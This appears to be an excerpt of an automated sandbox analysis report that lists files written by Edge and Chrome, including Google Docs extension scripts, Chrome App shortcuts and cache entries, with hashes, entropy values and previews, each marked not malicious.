                                                                                                                                                                                                                                                                                                                  SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                                  SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3777)
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):98880
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.414989230634404
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:M+TW9bPq1M3ZOC0pJ/BjXf3Zk/7hry6fq66V3gr9KUw5SXfPxhZhGurH6c/V:WPLZwJJXf3ZvRV3gJKU/fP+urHRV
                                                                                                                                                                                                                                                                                                                  MD5:DC93A1045D1AD8D7ADD06B93B2FE79E2
                                                                                                                                                                                                                                                                                                                  SHA1:CAFCC8DB7F8E3FD2F8C1EFAC7B385D7616F55EA3
                                                                                                                                                                                                                                                                                                                  SHA-256:D5CEB4449384CD2D7898C052B7B99417961880945FC4EAE80EBBAF8E24CC0A3E
                                                                                                                                                                                                                                                                                                                  SHA-512:025F7103D1F7D607825BE916D0131C1E04B295EB562974A77F5A16E7BF40250B5608071779B420E4738F86F09A6F7C889469FA898268894FFFEEB7465C589E81
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function l(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                                  MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                                  SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                                  SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                                  SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3782)
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):107677
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.396220758526552
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:7nwyvB1qCo7mWUgsUopF5Xy4FlAwxdhvHcrdncqAKxwjBnKwIDQgrOChkPIgmrCp:wh6gstXy4FM5ncJKxCnKWgrd0v
                                                                                                                                                                                                                                                                                                                  MD5:E8015AC436B33034EDF7DA060E853A04
                                                                                                                                                                                                                                                                                                                  SHA1:62D0F6EB0E441158A1F56F6E0C70D3D229B57886
                                                                                                                                                                                                                                                                                                                  SHA-256:23C953E989FF4AF6126D4A3B2AD21B33A82512FC8768045C00F05940DE2C9978
                                                                                                                                                                                                                                                                                                                  SHA-512:C35AC8692FC22B78365CA202E173A90AE4B5DBA338B7FC9EEB17EDDF5868B52CF1D13DC0EDAF36BE1CC0E0152F41AC4027C51D7ECA27778B483E3FC83F11EA82
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function k(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 21 13:48:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2677
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.984630421038291
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:8M0d2TyO2cH6idAKZdA1oehwiZUklqehgy+3:8M9/2w3y
                                                                                                                                                                                                                                                                                                                  MD5:9029C2C5F3FB9ADB81CF9AADA3CCE4BE
                                                                                                                                                                                                                                                                                                                  SHA1:8F395D7C32AFE6CB61A1EC77EC404E27F87B5248
                                                                                                                                                                                                                                                                                                                  SHA-256:FACD4309C11A26F83A6551B0F12470C95BC88297E6E01A57CE960AF0D7E3FE1A
                                                                                                                                                                                                                                                                                                                  SHA-512:F8F8DAC68EBA19FA73575B589532B79A1F989C41ACA7CA9AFA062768902C0B3B9EF88E58E29B27265D7362DB683EDA2444FF5D500CAD8393B8AD252CED9471E2
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,....2.ng$<..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.IuY.v....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VuY.v....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VuY.v....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VuY.v..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VuY.v...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............L.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 21 13:48:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2679
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9996670752156116
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:8x0d2TyO2cH6idAKZdA1leh/iZUkAQkqehny+2:8x9/2K9QKy
                                                                                                                                                                                                                                                                                                                  MD5:254A0959412E38776A947CAE070D006B
                                                                                                                                                                                                                                                                                                                  SHA1:7FDE4C6C22C268B8B197ECA87F2BB5076F683739
                                                                                                                                                                                                                                                                                                                  SHA-256:8AE13F531F5B1114B249CC66FC70558FBC7BC603E6461F8D6964970E228FAC5F
                                                                                                                                                                                                                                                                                                                  SHA-512:E191C3B276DBDDC6E007672A71B29F6291DA86FADAEB590943025CAB7C44C0DC76216BC9BED9F8CDBB75A8ACEA4EDF00E4301ADD198022CB474D363841C00251
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,....+TYg$<..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.IuY.v....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VuY.v....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VuY.v....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VuY.v..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VuY.v...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............L.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:00:51 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2693
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.008761234881798
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:8j0d2TyObH6idAKZdA14t5eh7sFiZUkmgqeh7sBy+BX:8j9/Pnzy
                                                                                                                                                                                                                                                                                                                  MD5:E3DD729568709E88CB1B77C215E53A6E
                                                                                                                                                                                                                                                                                                                  SHA1:D230E3CF73882CC42D1F6F92F8F9EE221C38986F
                                                                                                                                                                                                                                                                                                                  SHA-256:9C96E7FFD58C380F1D911161898114F5D1F8E39E6BB72658E029313A13F55F0A
                                                                                                                                                                                                                                                                                                                  SHA-512:A9DF9A768D75988BFAA3DD0EDE649CCE05ACBAC814431ED5F2E56205CCC43DE07677814C4D8CE889EA1572E26454D2DED1C421DE42BC4003856577A7E1370D0A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,.....C..b...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.IuY.v....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VuY.v....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VuY.v....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VuY.v..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VEW.@...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............L.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 21 13:48:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2681
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9977782865204796
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:8t0d2TyO2cH6idAKZdA16ehDiZUkwqehby+R:8t9/2hpy
                                                                                                                                                                                                                                                                                                                  MD5:B2CC05B3B3BC07F1EC41569AB29B1728
                                                                                                                                                                                                                                                                                                                  SHA1:E1C0CCC675FD30ECC11EE09C60442E58D253B7EE
                                                                                                                                                                                                                                                                                                                  SHA-256:F6622703CDF92102EA6E21CBCD04BA4657A3910056735E2ABCE2384D8B44DE30
                                                                                                                                                                                                                                                                                                                  SHA-512:AC9077910898C6E0F89209E0A0A6E9069BCD16608BAF6E4074AD16892F8ECC2E9B1721766E3548ED0CD81B83B67F0BFAB9D0EAA098C49220E547D12A46D20F2E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,....whMg$<..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.IuY.v....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VuY.v....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VuY.v....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VuY.v..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VuY.v...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............L.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 21 13:48:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2681
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9891091115370583
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:8c0d2TyO2cH6idAKZdA1UehBiZUk1W1qehty+C:8c9/2B9Ny
                                                                                                                                                                                                                                                                                                                  MD5:D1EDA6C4000CFB49471835F3F80FD6FB
                                                                                                                                                                                                                                                                                                                  SHA1:FEC0D4C7D7289902B89C3C2B1D83C967886F664B
                                                                                                                                                                                                                                                                                                                  SHA-256:C25AF9576BBAEDE8634CB1B315CC4E35084C43F952E3900F469A9D6BED578AD9
                                                                                                                                                                                                                                                                                                                  SHA-512:DC8167FAA297D8BD64FF918579AC4F4320671D6D496FE3B74A38B7553E1D283A3D284936603AB1B54021797A53F370735CDC43538C36E02EF58440EE41657EAA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,......bg$<..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.IuY.v....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VuY.v....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VuY.v....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VuY.v..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VuY.v...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............L.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Nov 21 13:48:18 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2683
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.996159743529515
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:8g0d2TyO2cH6idAKZdA1duTrehOuTbbiZUk5OjqehOuTbzy+yT+:8g9/2eTYTbxWOvTbzy7T
                                                                                                                                                                                                                                                                                                                  MD5:FED9A0B8729818B9940CD29BADC2A400
                                                                                                                                                                                                                                                                                                                  SHA1:BDB0812C38A11888E7B70FC0F9C3A316522E87EF
                                                                                                                                                                                                                                                                                                                  SHA-256:C1BF888F44190D844851B136D05A6CA1680A0923E352601218E4EAB4436AAA23
                                                                                                                                                                                                                                                                                                                  SHA-512:4E09E3799BF5D10FC24B1FB85C9164ADF5E695A9202824A9152367FC2FBD86836B2E7C0B748D75E6573C608BA50390E38E59747AC546AACFE3B9B58408FC3295
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,.....&Dg$<..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.IuY.v....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VuY.v....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VuY.v....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VuY.v..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VuY.v...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............L.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                                  Chrome Cache Entry: 246

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (766)
                                                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                                                  Size (bytes):771
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.139286770870073
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:Sw1x2fPF+ssAoWBHslgT9lCuABuFA7F7HHHHHHHYqmffffffo:d18fPSARKlgZ01BuFYFEqmffffffo
                                                                                                                                                                                                                                                                                                                  MD5:D8A934708568BA4C3C5A7CD9B2D03958
                                                                                                                                                                                                                                                                                                                  SHA1:4C12AF38C839B983410CFB5FE5A3461CA4ED0D75
                                                                                                                                                                                                                                                                                                                  SHA-256:A44F15962C1C2B10374676C3D0D23A18AE8F56EF421E8E1C9ABD5583F438E7C4
                                                                                                                                                                                                                                                                                                                  SHA-512:F4BC540D5DEAC2FA35C56B02DD9A0024A6B53D21CB870C5FE9554E5300C6B0D2FB8484FB03DA361CE3EB4C0DA393F6393901BDC31EEBF0886FCBFDA99E874454
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                                                  Preview:)]}'.["",["high potential new episodes","final fantasy xiv mobile","spacex starship test flight","magnetic north pole moving","eli morgan cubs trade","weather tornado warning","cma awards 2024 winners","wordle hint november 21"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1251,1250,601,600,553,552,551,550],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

                                                                                                                                                                                                                                                                                                                  Chrome Cache Entry: 247

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                                                  MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                                                  SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                                                  SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                                                  SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                                                  Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                                                                                  Chrome Cache Entry: 248

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                                                  Size (bytes):132965
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.435146399832278
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:fmkXyPqO7UX1Hme9kZbs4Voc5rSnXqwQ2i6o:fZyWFHrp4Voc5rSnawQ8o
                                                                                                                                                                                                                                                                                                                  MD5:8725FAC5D30D86E895557023D40B0C1E
                                                                                                                                                                                                                                                                                                                  SHA1:43C8A5AB28175761BE25492BD1DA3D0CAF28A61D
                                                                                                                                                                                                                                                                                                                  SHA-256:4CBC0031A7B48C1DE21D0A8A43B4A89FD368D2E7F85F9D9926F9A3F4FB785D7D
